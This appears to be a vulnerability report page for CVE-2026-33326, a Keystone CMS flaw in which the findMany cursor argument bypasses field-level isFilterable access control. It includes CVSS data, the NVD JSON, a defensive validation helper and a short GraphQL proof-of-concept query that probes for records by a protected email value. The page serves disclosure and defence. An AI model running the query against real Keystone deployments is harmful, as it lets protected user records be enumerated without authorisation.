Security Vulnerability Report
CVE-2026-33326 CVSS 4.3 MEDIUM

CVE-2026-33326

Published: 2026-03-24 20:16:28
Last Modified: 2026-05-04 15:26:16

Description

Keystone is a content management system for Node.js. Prior to version 6.5.2, {field}.isFilterable access control can be bypassed in findMany queries by passing a cursor. This can be used to confirm the existence of records by protected field values. The fix for CVE-2025-46720 (field-level isFilterable bypass for update and delete mutations) added checks to the where parameter in update and delete mutations; however, the cursor parameter in findMany was not patched and accepts the same UniqueWhere input type. This issue has been patched in version 6.5.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:* - VULNERABLE
Keystone < 6.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
graphql
# GraphQL PoC for CVE-2026-33326
# Target: Keystone < 6.5.2
# Description: Bypass isFilterable access control using cursor in findMany query
query ExploitCursorCheck {
  # Attacker constructs a query targeting a protected unique field (e.g., email)
  # Normally filtering by 'email' is restricted by isFilterable: false
  # However, the 'cursor' parameter accepts UniqueWhere input without this check.
  # 'findMany' stands in for the list's findMany query, which Keystone names after the list (e.g. users)
  findMany(
    # The cursor is set to the sensitive value we want to check existence of
    cursor: { email: "[email protected]" }
  ) {
    id
    name
    # If the record exists, the query will return data (or specific errors)
    # If it doesn't exist, it returns empty.
    # This confirms the existence of the email address.
  }
}
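The defender-side check that closes this gap is one that validates every argument accepting a where or UniqueWhere object, the findMany cursor included, against the field-level isFilterable setting. The helper below is an added illustration, not Keystone's own code; the list definition, field names and function names are hypothetical.

```javascript
// Added example (not Keystone's own code): apply the field-level "isFilterable"
// rule to every argument that carries a where / UniqueWhere object, so that the
// findMany `cursor` argument gets the same treatment as `where`.
// The list definition below is constructed for illustration.
const listConfig = {
  name: 'User',
  fields: {
    id:    { isFilterable: true },
    name:  { isFilterable: true },
    email: { isFilterable: false }, // protected: must never be usable as a filter key
  },
};

// Collect every field name used as a key in a where-style object, descending
// through AND / OR / NOT combinators so nesting cannot hide a protected key.
function collectFilterFields(node, out = new Set()) {
  if (node === null || typeof node !== 'object') return out;
  if (Array.isArray(node)) {
    node.forEach((n) => collectFilterFields(n, out));
    return out;
  }
  for (const [key, value] of Object.entries(node)) {
    if (key === 'AND' || key === 'OR' || key === 'NOT') collectFilterFields(value, out);
    else out.add(key); // a real field name; its operator object is not inspected further
  }
  return out;
}

// Return the field names in args.where and args.cursor that are not filterable.
// An empty array means the query may proceed. Unknown fields are rejected too.
function findNonFilterableFields(list, args) {
  const violations = new Set();
  for (const argName of ['where', 'cursor']) {
    for (const field of collectFilterFields(args[argName])) {
      const cfg = list.fields[field];
      if (!cfg || cfg.isFilterable !== true) violations.add(field);
    }
  }
  return [...violations];
}

// Gate to run before the findMany resolver touches the database.
function assertFilterable(list, args) {
  const bad = findNonFilterableFields(list, args);
  if (bad.length) {
    throw new Error(`Access denied: cannot filter ${list.name} by ${bad.join(', ')}`);
  }
  return args;
}
```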

References

https://github.com/keystonejs/keystone/security/advisories/GHSA-cgcg-q9jh-5pr2 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33326", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:28.043", "lastModified": "2026-05-04T15:26:15.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Keystone is a content management system for Node.js. Prior to version 6.5.2, {field}.isFilterable access control can be bypassed in findMany queries by passing a cursor. This can be used to confirm the existence of records by protected field values. The fix for CVE-2025-46720 (field-level isFilterable bypass for update and delete mutations) added checks to the where parameter in update and delete mutations however the cursor parameter in findMany was not patched and accepts the same UniqueWhere input type. This issue has been patched in version 6.5.2."}, {"lang": "es", "value": "Keystone es un sistema de gestión de contenido para Node.js. Antes de la versión 6.5.2, el control de acceso {field}.isFilterable puede ser eludido en consultas findMany al pasar un cursor. Esto puede usarse para confirmar la existencia de registros mediante valores de campos protegidos. La corrección para CVE-2025-46720 (elusión de isFilterable a nivel de campo para mutaciones de actualización y eliminación) añadió comprobaciones al parámetro where en las mutaciones de actualización y eliminación; sin embargo, el parámetro cursor en findMany no fue parcheado y acepta el mismo tipo de entrada UniqueWhere. Este problema ha sido parcheado en la versión 6.5.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "6.5.2", "matchCriteriaId": "7115F298-5F71-4F46-ADD2-ED8159B278A5"}]}]}], "references": [{"url": "https://github.com/keystonejs/keystone/security/advisories/GHSA-cgcg-q9jh-5pr2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}